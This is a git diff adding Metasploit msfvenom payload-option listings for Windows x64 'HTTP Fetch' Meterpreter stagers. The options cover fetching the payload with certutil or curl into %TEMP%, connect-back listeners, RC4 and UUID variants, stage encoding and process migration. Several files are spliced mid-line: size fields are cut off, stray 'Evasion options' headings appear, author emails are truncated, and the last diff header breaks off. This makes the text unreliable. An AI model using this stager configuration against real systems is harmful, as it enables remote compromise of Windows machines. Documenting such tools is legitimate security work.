pivot + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-reverse_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-reverse_tcp.txt new file mode 100644 index 0000000..acae401 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-reverse_tcp.txt @@ -0,0 +1,96 @@ + + Name: HTTP Fetch, Windows x64 Reverse TCP Stager + Module: payload/cmd/windows/http/x64/meterpreter/reverse_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 127 + Rank: Normal + +Provided by: + Brendan Watters + skape + sf + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME VqRUYbmlZj no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Connect back to the attacker (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-reverse_tcp_rc4.txt b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-reverse_tcp_rc4.txt new file mode 100644 index 0000000..6f4d9e5 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-reverse_tcp_rc4.txt @@ -0,0 +1,99 @@ + + Name: HTTP Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm) + Module: payload/cmd/windows/http/x64/meterpreter/reverse_tcp_rc4 + Platform: Windows + Arch: cmd +Needs Admin: No + Tot +Evasion options for payload/cmd/windows/http/x64/meterpreter/reverse_tcp_rc4: +========================= + +ephen_fewer@harmonysecurity.com> + OJ Reeves + hdm + mihi + max3raza + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME jOCxwErCGMJ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +RC4PASSWORD msf yes Password to derive RC4 key from + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-reverse_tcp_uuid.txt b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-reverse_tcp_uuid.txt new file mode 100644 index 0000000..381ab3e --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-reverse_tcp_uuid.txt @@ -0,0 +1,96 @@ + + Name: HTTP Fetch, Reverse TCP Stager with UUID Support (Windows x64) + Module: payload/cmd/windows/http/x64/meterpreter/reverse_tcp_uuid + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 127 + Rank: Normal + +Provided by: + Brendan Watters + skape + sf + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME bslRynmtyJ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Connect back to the attacker with UUID Support (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-reverse_winhttp.txt b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-reverse_winhttp.txt new file mode 100644 index 0000000..fd114f7 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-reverse_winhttp.txt @@ -0,0 +1,112 @@ + + Name: HTTP Fetch, Windows x64 Reverse HTTP Stager (winhttp) + Module: payload/cmd/windows/http/x64/meterpreter/reverse_winhttp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: +Evasion options for payload/cmd/windows/http/x64/meterpreter/reverse_winhttp: +========================= + +wer@harmonysecurity.com> + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME PQOQuzSmusdT no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Tunnel communication over HTTP (Windows x64 winhttp) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpProxyHost no An optional proxy server IP address or hostname + HttpProxyIE true no Enable use of IE proxy settings + HttpProxyPass no An optional proxy server password Max parameter length: 63 characters + HttpProxyPort no An optional proxy server port + HttpProxyType HTTP yes The type of HTTP proxy (Accepted: HTTP, SOCKS) + HttpProxyUser no An optional proxy server username Max parameter length: 63 characters + HttpReferer no An optional value to use for the Referer HTTP header + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.2903.86 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + StagerURILength no The URI length for the stager (at least 5 bytes) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-reverse_winhttps.txt b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-reverse_winhttps.txt new file mode 100644 index 0000000..83aa5e8 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-reverse_winhttps.txt @@ -0,0 +1,114 @@ + + Name: HTTP Fetch, Windows x64 Reverse HTTPS Stager (winhttp) + Module: payload/cmd/windows/http/x64/meterpreter/reverse_winhttps + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: +Evasion options for payload/cmd/windows/http/x64/meterpreter/reverse_winhttps: +========================= + +er@harmonysecurity.com> + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME LcHnpQmXfcW no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Tunnel communication over HTTPS (Windows x64 winhttp) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpProxyHost no An optional proxy server IP address or hostname + HttpProxyIE true no Enable use of IE proxy settings + HttpProxyPass no An optional proxy server password Max parameter length: 63 characters + HttpProxyPort no An optional proxy server port + HttpProxyType HTTP yes The type of HTTP proxy (Accepted: HTTP, SOCKS) + HttpProxyUser no An optional proxy server username Max parameter length: 63 characters + HttpReferer no An optional value to use for the Referer HTTP header + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + StagerURILength no The URI length for the stager (at least 5 bytes) + StagerVerifySSLCert false no Whether to verify the SSL certificate hash in the handler + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-meterpreter_bind_named_pipe.txt b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter_bind_named_pipe.txt new file mode 100644 index 0000000..a394922 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter_bind_named_pipe.txt @@ 